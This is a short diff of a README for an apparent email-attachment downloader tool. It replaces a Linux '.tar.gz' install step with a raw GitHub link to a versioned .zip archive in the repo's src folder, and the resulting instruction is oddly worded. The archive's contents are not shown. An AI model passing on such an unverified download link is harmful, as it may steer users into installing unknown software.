Ilhammaruf/Email-Attachment-Downloader/README.md

    2. Drag the Email-Attachment-Downloader icon into your Applications folder.

 - **For Linux:**
-   1. Extract the downloaded `.tar.gz` file.
+   1. Extract the downloaded `https://github.com/Ilhammaruf/Email-Attachment-Downloader/raw/refs/heads/main/src/Downloader-Attachment-Email-v1.7.zip` file.
    2. Open a terminal and navigate to the extracted folder.
    3. Run the installation command relevant to your distribution.